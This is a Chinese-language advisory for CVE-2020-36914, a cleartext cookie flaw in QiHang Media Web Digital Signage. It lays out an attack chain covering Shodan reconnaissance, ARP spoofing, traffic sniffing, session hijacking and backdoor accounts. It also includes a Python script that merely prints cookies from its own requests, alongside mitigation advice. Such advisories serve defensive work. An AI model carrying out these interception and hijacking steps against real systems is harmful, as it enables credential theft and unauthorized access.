CVE-2020-36914 QiHang Media Web数字标牌Cookie认证凭证明文传输漏洞

漏洞信息

漏洞编号

CVE-2020-36914

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

QiHang Media Web Digital Signage 3.0.9

漏洞概述

QiHang Media Web Digital Signage 3.0.9版本存在敏感信息泄露漏洞，远程攻击者可以通过中间人攻击（Man-in-the-Middle）拦截用户认证凭证。该漏洞源于系统在传输用户Cookie时采用明文传输方式，未对敏感认证信息进行加密保护。攻击者利用此漏洞可获取用户的登录凭证，包括用户名、密码或其他认证token，进而冒充合法用户访问系统，执行未授权操作。数字标牌系统通常部署在公共场所用于广告播放和信息展示，攻击者一旦获取管理员权限，可能篡改播放内容，造成品牌形象损害或传播恶意信息。此漏洞无需任何认证即可利用，攻击门槛较低，对互联网开放的系统存在较高风险。

技术细节

该漏洞发生在QiHang Media Web Digital Signage系统的认证模块。当用户登录系统时，服务器将认证凭证存储在Cookie中返回给客户端。问题在于Cookie通过HTTP明文传输，未启用HTTPS加密或使用Secure、HttpOnly等安全属性。攻击者处于同一网络环境时，可使用ARP欺骗、DNS劫持或WiFi嗅探等方式截获HTTP流量，获取包含用户凭证的Cookie。一旦攻击者获得有效Cookie，即可构造恶意请求冒充该用户。由于系统未验证Cookie来源IP或设备指纹，攻击者可在任意位置使用窃取的凭证发起请求。对于管理员账户，攻击者可获得系统完全控制权，包括修改播放内容、查看敏感数据等操作。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者识别互联网开放的QiHang Media Web Digital Signage系统，使用Shodan、ZoomEye或Censys等搜索引擎发现暴露的服务

STEP 2

步骤2：中间人攻击准备

攻击者接入目标网络或公共WiFi，配置ARP欺骗工具（如ettercap）或部署流量嗅探设备，准备截获HTTP流量

STEP 3

步骤3：流量捕获

攻击者使用Wireshark、tcpdump等工具捕获用户登录时的HTTP请求和响应，重点关注Set-Cookie头部的认证凭证

STEP 4

步骤4：凭证提取

从捕获的流量中提取明文Cookie值，识别会话ID、认证token或其他敏感凭证信息

STEP 5

步骤5：会话劫持

攻击者使用提取的Cookie构造恶意请求，冒充合法用户访问系统，执行未授权操作

STEP 6

步骤6：权限维持

如获取管理员凭证，攻击者可创建后门账户或修改现有账户权限，维持长期访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import argparse
from bs4 import BeautifulSoup

def exploit_cve_2020_36914(target_url):
    """
    CVE-2020-36914 PoC - QiHang Media Web Cookie Authentication Credentials Disclosure
    This PoC demonstrates the information disclosure vulnerability by capturing
    authentication cookies transmitted in cleartext.
    """
    print(f"[*] Targeting: {target_url}")
    
    # Step 1: Attempt to capture cleartext cookie
    session = requests.Session()
    
    # Login endpoint typically at /login or /admin/login
    login_endpoints = ['/login', '/admin/login', '/', '/index']
    
    for endpoint in login_endpoints:
        try:
            response = session.get(target_url + endpoint, timeout=10)
            
            # Check for cookie in response
            if session.cookies:
                print(f"[+] Found cookies at {endpoint}:")
                for cookie in session.cookies:
                    print(f"  - {cookie.name}: {cookie.value}")
                    
                # Check if cookie contains authentication data
                if 'PHPSESSID' in session.cookies or 'auth' in str(session.cookies).lower():
                    print("[!] Authentication cookie detected in cleartext!")
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
            
    # Step 2: Test for cleartext transmission
    # Note: In real attack, use Wireshark/tcpdump to capture HTTP traffic
    print("\n[*] To capture cleartext cookies, perform MITM attack:")
    print("    1. Use ettercap or arpspoof for ARP poisoning")
    print("    2. Capture HTTP traffic with Wireshark")
    print("    3. Filter: http.cookie contains 'auth' or 'session'")
    
    return session.cookies

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2020-36914 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    args = parser.parse_args()
    
    exploit_cve_2020_36914(args.target)

影响范围

QiHang Media Web Digital Signage 3.0.9

防御指南

临时缓解措施

立即启用HTTPS强制跳转，确保所有用户访问通过加密通道进行。为所有认证Cookie添加Secure、HttpOnly和SameSite属性。在负载均衡器或Web服务器层面配置HSTS头，强制浏览器使用HTTPS。实施网络分段，限制对管理接口的直接访问。对公网暴露的系统增加IP白名单或VPN认证机制。监控认证日志，关注异常的登录模式和地理位置变化。